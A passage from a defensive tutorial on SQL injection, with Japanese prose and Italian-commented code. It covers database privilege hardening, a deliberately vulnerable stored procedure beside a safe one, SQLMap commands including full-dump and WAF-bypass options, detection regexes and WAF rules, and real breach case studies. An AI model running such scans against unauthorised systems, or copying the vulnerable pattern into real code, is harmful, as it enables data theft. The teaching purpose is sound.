GRANT USAGE, SELECT ON ALL SEQUENCES IN SCHEMA public TO app_web;
-- NO: CREATE TABLE, DROP TABLE, TRUNCATE, ALTER, DDL

-- Utente per reports/analytics (solo SELECT)
CREATE USER app_reports WITH PASSWORD 'another_strong_password';
GRANT CONNECT ON DATABASE myapp TO app_reports;
GRANT USAGE ON SCHEMA public TO app_reports;
GRANT SELECT ON ALL TABLES IN SCHEMA public TO app_reports;
-- NO: INSERT, UPDATE, DELETE, DDL

-- Utente per migrazioni (solo DDL, non in produzione normale)
CREATE USER app_migrations WITH PASSWORD 'migration_password';
GRANT ALL PRIVILEGES ON DATABASE myapp TO app_migrations;
-- Questo utente viene usato SOLO durante le migrazioni, poi disabilitato:
-- ALTER USER app_migrations VALID UNTIL '2025-12-31';

-- 2. Revoca i permessi di default
REVOKE ALL ON SCHEMA public FROM PUBLIC;
REVOKE CREATE ON SCHEMA public FROM PUBLIC;

-- 3. Proteggi tabelle sensibili
-- Crea una view mascherata per dati sensibili
CREATE VIEW users_public AS
  SELECT id, username, email, role, created_at
  FROM users;
  -- Esclude: password_hash, reset_token, 2fa_secret

-- Revoca accesso diretto alla tabella users per app_reports
REVOKE SELECT ON users FROM app_reports;
-- Concedi accesso solo alla view
GRANT SELECT ON users_public TO app_reports;

-- 4. Abilita Row Level Security (RLS) per isolamento multi-tenant
ALTER TABLE documents ENABLE ROW LEVEL SECURITY;

CREATE POLICY documents_tenant_isolation ON documents
  USING (tenant_id = current_setting('app.current_tenant_id')::integer);

-- In PostgreSQL, imposta il tenant prima delle query:
-- SET app.current_tenant_id = '123';

-- 5. Disabilita funzioni pericolose
REVOKE EXECUTE ON FUNCTION pg_read_file(text) FROM PUBLIC;
REVOKE EXECUTE ON FUNCTION pg_ls_dir(text) FROM PUBLIC;
-- Su MySQL/MariaDB:
-- REVOKE FILE ON *.* FROM 'app_web'@'%';

-- 6. Audit log per query sospette (PostgreSQL)
-- Installa pgaudit e configura in postgresql.conf:
-- shared_preload_libraries = 'pgaudit'
-- pgaudit.log = 'all'
-- pgaudit.log_relation = on

安全なストアドプロシージャ

ストアドプロシージャを正しく使用すると、追加の防御層が追加されます。ストアドプロシージャはデータベース内の SQL ロジックをカプセル化し、アプリケーションが使用できるインターフェイスを制限します。ただし、動的 SQL を内部で構築する場合は脆弱になる可能性があります。

-- Stored Procedure SICURA in PostgreSQL
-- Le SP fisse (non dynamic SQL) sono immuni a SQL injection

CREATE OR REPLACE FUNCTION authenticate_user(
  p_username VARCHAR(50),
  p_password_hash VARCHAR(255)
)
RETURNS TABLE(user_id INT, role VARCHAR(20))
LANGUAGE plpgsql
SECURITY DEFINER  -- Esegue con i permessi del definer (DBA), non del chiamante
AS $
BEGIN
  -- Query statica con parametri: impossibile iniettare SQL
  RETURN QUERY
    SELECT u.id, u.role
    FROM users u
    WHERE u.username = p_username
      AND u.password_hash = p_password_hash
      AND u.is_active = TRUE;

  -- Log del tentativo (senza esporre la password)
  INSERT INTO auth_audit_log (username, attempt_time, success)
  VALUES (p_username, NOW(), FOUND);
END;
$;

-- Concedi EXECUTE solo all'utente applicativo
GRANT EXECUTE ON FUNCTION authenticate_user TO app_web;
-- Revoca accesso diretto alla tabella users!
REVOKE SELECT ON users FROM app_web;

-- VULNERABILE: stored procedure con SQL dinamico
CREATE OR REPLACE FUNCTION search_products_UNSAFE(p_search TEXT)
RETURNS SETOF products
LANGUAGE plpgsql AS $
DECLARE
  v_query TEXT;
BEGIN
  -- MAI costruire SQL dinamico con input utente!
  v_query := 'SELECT * FROM products WHERE name LIKE ''%' || p_search || '%''';
  RETURN QUERY EXECUTE v_query;  -- Vulnerabile!
END;
$;

-- SICURO: stored procedure con SQL dinamico e parametri
CREATE OR REPLACE FUNCTION search_products_safe(p_search TEXT)
RETURNS SETOF products
LANGUAGE plpgsql AS $
BEGIN
  -- EXECUTE ... USING passa i parametri in modo sicuro
  RETURN QUERY EXECUTE
    'SELECT * FROM products WHERE name LIKE $1'
    USING '%' || p_search || '%';  -- Parametro sicuro
END;
$;

SQLMap: 攻撃者の前にアプリケーションをテストする

SQLマップ 自動 SQL インジェクションテストに最も広く使用されているオープンソースツールです。 MySQL、PostgreSQL、Microsoft SQL Server、Oracle、その他多くの DBMS をサポートします。使ってください あなたが所有するシステム、または明示的な書面による許可のあるシステムのみ.

# SQLMap: comandi essenziali per penetration testing

# Test base su un URL con parametro GET
sqlmap -u "https://localhost:3000/api/products?id=1" --batch

# Test con autenticazione (cookie di sessione)
sqlmap -u "https://localhost:3000/api/products?id=1" \
  --cookie="session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." \
  --batch

# Test su richiesta POST con body JSON
sqlmap -u "https://localhost:3000/api/login" \
  --data='{"username":"test","password":"test"}' \
  --content-type="application/json" \
  --batch

# Test più aggressivo: tutte le tecniche di injection
sqlmap -u "https://localhost:3000/api/products?id=1" \
  --level=5 \          # Livello di test (1-5)
  --risk=3 \           # Rischio di danni (1-3, usa 2 in test)
  --technique=BEUST \  # Tutte le tecniche: Boolean, Error, Union, Stacked, Time
  --batch

# Dump dello schema (solo se vulnerabile, a scopo dimostrativo)
sqlmap -u "https://localhost:3000/api/products?id=1" \
  --dbs \          # Lista dei database
  --tables \       # Lista delle tabelle
  --dump-all \     # Dump completo (USARE CON CAUTELA)
  --batch

# Test con tamper script per bypass WAF
sqlmap -u "https://localhost:3000/api/products?id=1" \
  --tamper=space2comment,between,randomcase \
  --batch

# Genera report HTML
sqlmap -u "https://localhost:3000/api/products?id=1" \
  --batch \
  --output-dir=/tmp/sqlmap-report

# Test su file di richiesta HTTP (catturata con Burp Suite)
# Salva la richiesta in request.txt:
# GET /api/products?id=1 HTTP/1.1
# Host: localhost:3000
# Cookie: session=...
sqlmap -r request.txt --batch

SQLMap を CI/CD に統合する

テストを自動化するには、SQLMap をステージングパイプラインに統合します。 GitHub アクションの例:

# .github/workflows/security-test.yml
name: Security Tests - SQL Injection

on:
  push:
    branches: [main, develop]
  pull_request:
    branches: [main]

jobs:
  sqlmap-scan:
    runs-on: ubuntu-latest
    services:
      app:
        image: myapp:${{ github.sha }}
        ports:
          - 3000:3000
        env:
          DATABASE_URL: postgresql://test:test@postgres/testdb

      postgres:
        image: postgres:15
        env:
          POSTGRES_PASSWORD: test
          POSTGRES_USER: test
          POSTGRES_DB: testdb

    steps:
      - uses: actions/checkout@v4

      - name: Install SQLMap
        run: pip install sqlmap

      - name: Wait for app to be ready
        run: |
          timeout 30 bash -c 'until curl -s http://localhost:3000/health; do sleep 1; done'

      - name: Run SQLMap against API endpoints
        run: |
          sqlmap \
            -u "http://localhost:3000/api/products?id=1" \
            --batch \
            --level=3 \
            --risk=1 \
            --output-dir=./sqlmap-results \
            --format=json \
            --no-logging

      - name: Check for vulnerabilities
        run: |
          # Fallisce la build se SQLMap trova vulnerabilità
          if grep -q '"vulnerable": true' ./sqlmap-results/*.json 2>/dev/null; then
            echo "CRITICAL: SQL Injection vulnerability found!"
            cat ./sqlmap-results/*.json
            exit 1
          fi

      - name: Upload results
        uses: actions/upload-artifact@v4
        if: always()
        with:
          name: sqlmap-report
          path: ./sqlmap-results/

WAF とランタイム保護

Un ウェブアプリケーションファイアウォール (WAF) アプリケーションの前に防御層を追加し、HTTP リクエストを分析して既知の攻撃パターンを検出します。これは安全なコードに代わるものではありませんが、ゼロデイ攻撃や自動化された攻撃のリスクを軽減します。

# Configurazione WAF con ModSecurity (Apache/Nginx) + OWASP CRS

# nginx.conf - Abilita ModSecurity
server {
    listen 443 ssl;
    server_name api.example.com;

    # Abilita ModSecurity
    modsecurity on;
    modsecurity_rules_file /etc/nginx/modsecurity/modsecurity.conf;

    # OWASP Core Rule Set
    include /etc/nginx/modsecurity/crs/crs-setup.conf;
    include /etc/nginx/modsecurity/crs/rules/*.conf;

    location / {
        proxy_pass http://localhost:3000;
        proxy_set_header X-Real-IP $remote_addr;
    }
}

# modsecurity.conf - Configurazione base
SecRuleEngine On
SecRequestBodyAccess On
SecResponseBodyAccess Off

# Regola custom per proteggere endpoint critico
SecRule ARGS "@rx (union|select|insert|delete|update|drop|create)" \
    "id:1001,\
    phase:2,\
    block,\
    capture,\
    t:lowercase,\
    log,\
    msg:'Possible SQL Injection',\
    logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
    tag:'attack-sqli',\
    severity:'CRITICAL'"

# Rate limiting per prevenire brute force e scanning
limit_req_zone $binary_remote_addr zone=api:10m rate=100r/m;
limit_req_zone $binary_remote_addr zone=login:10m rate=10r/m;

server {
    location /api/ {
        limit_req zone=api burst=20 nodelay;
        limit_req_status 429;
    }

    location /api/auth/login {
        limit_req zone=login burst=5 nodelay;
        limit_req_status 429;
    }
}

// Runtime protection in Node.js con Helmet e express-rate-limit
import express from 'express';
import helmet from 'helmet';
import rateLimit from 'express-rate-limit';
import { sqlInjectionGuard } from './middleware/sql-injection-guard';

const app = express();

// 1. Helmet: header di sicurezza HTTP
app.use(helmet({
  contentSecurityPolicy: {
    directives: {
      defaultSrc: ["'self'"],
      scriptSrc: ["'self'"],
      styleSrc: ["'self'", "'unsafe-inline'"],
    },
  },
  referrerPolicy: { policy: 'strict-origin-when-cross-origin' },
}));

// 2. Rate limiting globale
const globalLimiter = rateLimit({
  windowMs: 15 * 60 * 1000,  // 15 minuti
  max: 1000,                  // Massimo 1000 richieste per IP
  standardHeaders: true,
  legacyHeaders: false,
  message: { error: 'Troppe richieste, riprova tra 15 minuti' },
});

const authLimiter = rateLimit({
  windowMs: 15 * 60 * 1000,
  max: 10,  // Solo 10 tentativi di login per 15 minuti
  skipSuccessfulRequests: true,
  message: { error: 'Troppi tentativi di accesso, account temporaneamente bloccato' },
});

app.use('/api/', globalLimiter);
app.use('/api/auth/', authLimiter);

// 3. Middleware custom per rilevare pattern SQL injection
function sqlInjectionGuard(req, res, next) {
  const suspiciousPatterns = [
    /(\bUNION\b.*\bSELECT\b)/i,
    /(\bSELECT\b.*\bFROM\b)/i,
    /('.*\bOR\b.*'.*=.*')/i,
    /(\bDROP\b.*\bTABLE\b)/i,
    /--\s*$/m,
    /;\s*$/,
    /\/\*.*\*\//,
    /\bEXEC\b.*\(/i,
    /\bCAST\b.*\bAS\b/i,
  ];

  const checkValue = (value) => {
    if (typeof value === 'string') {
      return suspiciousPatterns.some(pattern => pattern.test(value));
    }
    if (typeof value === 'object' && value !== null) {
      return Object.values(value).some(checkValue);
    }
    return false;
  };

  const sources = [req.body, req.query, req.params];
  const isSuspicious = sources.some(checkValue);

  if (isSuspicious) {
    // Log dettagliato per il team di sicurezza
    console.warn('Possible SQL injection attempt:', {
      ip: req.ip,
      method: req.method,
      url: req.url,
      timestamp: new Date().toISOString(),
    });
    // Risposta generica per non rivelare informazioni
    return res.status(400).json({ error: 'Richiesta non valida' });
  }

  next();
}

app.use('/api/', sqlInjectionGuard);

ケーススタディ: 実際の攻撃 2023 ～ 2025 年

MOVEit 転送 (CVE-2023-34362) - 今年の違反

2023 年 5 月、ファイル転送ソフトウェアで重大な SQL インジェクションが発生 MOVEit転送 Progress Software による事件は、最近の歴史の中で最も深刻なデータ侵害の 1 つを引き起こしました。この脆弱性 (CVE-2023-34362、CVSS 9.8) により、攻撃者は HTTP パラメーターを介して SQL を挿入し、認証をバイパスし、サーバー上で任意のコマンドを実行することができます。

その影響は壊滅的でした。 1,130万件の患者記録 マキシマスから盗まれたもの、米国エネルギー省、ルイジアナ自動車局、その他何百もの組織の違反。 Cl0p ランサムウェアグループはこの脆弱性を悪用し、世界中の 2,000 以上の組織から金銭を強要しました。集団訴訟は2024年まで続いた。

この脆弱性は、セッションを検証するために SQL クエリに直接連結された無効な HTTP パラメータにありました。たった 1 行の安全でないコードによって、数十億ドルの損害が発生しました。

TSA FlyCASS (2024) - 重要なインフラストラクチャの脆弱性

2024 年、セキュリティ研究者のイアンキャロルとサムカリーは、システム内の SQL インジェクションを発見しました。 フライキャス、米国TSA（運輸保安局）が航空会社の乗務員を検査するために使用します。この脆弱性により、攻撃者は権限のある職員のデータベースに任意の名前を追加し、空港のセキュリティ検査を回避できる可能性があります。

略奪者キャンペーンを再開 (2024)

グループ 履歴書略奪者 SQL インジェクションと XSS 攻撃を使用して、65 以上の求人サイトと小売サイトを侵害しました。彼らは、個人データ、履歴書、連絡先情報を含む何百万もの候補者の記録を盗みました。この事例は、SQL インジェクションが 2024 年現在も本番アプリケーションでどのように正常に使用されているかを示しています。

ケーススタディから得た教訓

これらすべてのケースにおいて、この脆弱性は文字列連結ではなく準備されたステートメントを使用することで技術的に簡単に修正できました。実際のコストはバグの修正ではなく、その結果生じる風評的、法的、経済的損害です。セキュリティは、侵害後に追加するのではなく、開発中に組み込む必要があります。

バックエンドセキュリティのためのAngular固有のチェックリスト

Angular で開発し、Node.js/NestJS バックエンドがある場合、統合する具体的なコントロールは次のとおりです。

// NestJS - Configurazione sicura con TypeORM

// 1. Usa TypeORM Repository API, evita query builder con interpolazione
@Injectable()
export class UserRepository {
  constructor(
    @InjectRepository(User)
    private readonly repository: Repository<User>,
  ) {}

  // SICURO: find() con TypeORM genera query parametrizzate
  async findByEmail(email: string): Promise<User | null> {
    return this.repository.findOne({ where: { email } });
  }

  // SICURO: QueryBuilder con parametri nominati
  async searchUsers(search: string, role: UserRole): Promise<User[]> {
    return this.repository
      .createQueryBuilder('user')
      .where('user.username LIKE :search AND user.role = :role', {
        search: `%${search}%`,
        role,
      })
      .select(['user.id', 'user.username', 'user.email'])
      .take(50)
      .getMany();
  }
}

// 2. ValidationPipe globale con class-validator
import { ValidationPipe } from '@nestjs/common';

// main.ts
async function bootstrap() {
  const app = await NestFactory.create(AppModule);

  // Abilita validazione globale con whitelist
  app.useGlobalPipes(new ValidationPipe({
    whitelist: true,       // Rimuove proprietà non dichiarate nel DTO
    forbidNonWhitelisted: true,  // Errore se ci sono proprietà extra
    transform: true,       // Trasforma automaticamente i tipi
    transformOptions: {
      enableImplicitConversion: true,
    },
  }));

  await app.listen(3000);
}

// 3. DTO con class-validator
import { IsString, IsEmail, MinLength, MaxLength, Matches } from 'class-validator';
import { Transform } from 'class-transformer';

export class CreateUserDto {
  @IsString()
  @MinLength(3)
  @MaxLength(50)
  @Matches(/^[a-zA-Z0-9_-]+$/, {
    message: 'Username deve contenere solo lettere, numeri, underscore e trattino',
  })
  @Transform(({ value }) => value?.trim().toLowerCase())
  username: string;

  @IsEmail()
  @Transform(({ value }) => value?.trim().toLowerCase())
  email: string;

  @IsString()
  @MinLength(8)
  @MaxLength(128)
  @Matches(
    /^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[@$!%*?&])[A-Za-z\d@$!%*?&]/,
    { message: 'Password troppo debole' }
  )
  password: string;
}

ベストプラクティス: 概要

練習する	優先度	インパクト
パラメータ化されたクエリ/プリペアドステートメント	批判	従来の SQL インジェクションと二次 SQL インジェクションを防止します
スキーマによる入力検証 (Zod/Pydantic)	高い	不正な入力が DB に到達する前に拒否する
標準 ORM API (生のクエリを回避)	高い	ORM インジェクションのリスクを軽減
DB の最小権限の原則	高い	攻撃が成功した場合のダメージを制限する
NoSQL サニタイズ (express-mongo-sanitize)	高い	NoSQL オペレーターインジェクションを防止します
ストアドプロシージャ (オプション)	平均	SQL ロジックをカプセル化し、攻撃対象領域を削減します
WAF (ModSecurity + OWASP CRS)	平均	既知の攻撃がアプリに到達する前にブロックします
重要なエンドポイントのレート制限	平均	ブルートフォーススキャンと自動スキャンを防止します
CI/CD 上の SQLMap	平均	セキュリティの後退を自動的に検出する
一般的なエラー処理 (スタックトレースなし)	平均	攻撃者に有益な情報を漏らすことはありません
データベース監査ログ	低い	侵害が発生した場合のフォレンジックが可能になります

一般的なアンチパターン

避けるべきよくある間違い

クエリ内の文字列連結: 単一の発生でもアプリケーション全体が危険にさらされる可能性があります。
データベースからのデータを信頼します。 DB からのデータには、以前に注入されたペイロード (2 次注入) が含まれている可能性があります。
アプリケーションにはデータベース root ユーザーを使用します。 侵害が発生した場合、攻撃者はサーバーに完全にアクセスできるようになります。
運用環境での詳細なデータベースエラーを表示します。 エラーメッセージから、DB の構造、バージョン、および攻撃者にとって有用なその他のデータが明らかになります。
ORM がすべてを解決すると信じています。 ORM の生のクエリメソッド ($queryRawUnsafe, query() 補間あり) も同様に脆弱です。
型の検証を忘れます: 整数でなければならないフィールドですが、JSON オブジェクトを受け入れ、NoSQL インジェクションに対して脆弱です。
CI/CD でセキュリティをテストしないでください。 SQLMap およびその他のツールをパイプラインに統合して、回帰を検出できます。

結論と次のステップ

SQL インジェクションは、2025 年においても Web アプリケーションに対する最も具体的で影響力のある脅威の 1 つです。幸いなことに、対策は明確に定義されており、実装は比較的簡単です。 パラメータ化されたクエリ, 入力検証 e 最小特権の原則 それらは、ほとんどの攻撃に対して効果的な防御トライアドを形成します。

MOVEit、FlyCASS、および ResumeLooters の事例は、問題は脆弱性の技術的な複雑さではなく、開発プロセスに統合されたセキュリティ規律の欠如であることを示しています。この記事で説明したパターンを使用すると、このクラスの脆弱性をコードから体系的に削除できます。

シリーズの次の記事では、セッションとCookieによる安全な認証: バックエンドセキュリティのもう 1 つの重要な柱。質問がある場合、または特定のケースについて詳しく知りたい場合は、コメントに書き込んでください。

Web セキュリティシリーズの関連記事

OWASP トップ 10 2025: 開発者ガイド - Web 脆弱性の一般的な背景
XSS、CSRF、および CSP: フロントエンドセキュリティ - セキュリティのフロントエンドに相当するもの
安全な認証: セッションと Cookie - シリーズの次のシリーズ
API セキュリティ: OAuth 2.1、JWT、レート制限 - REST APIのセキュリティ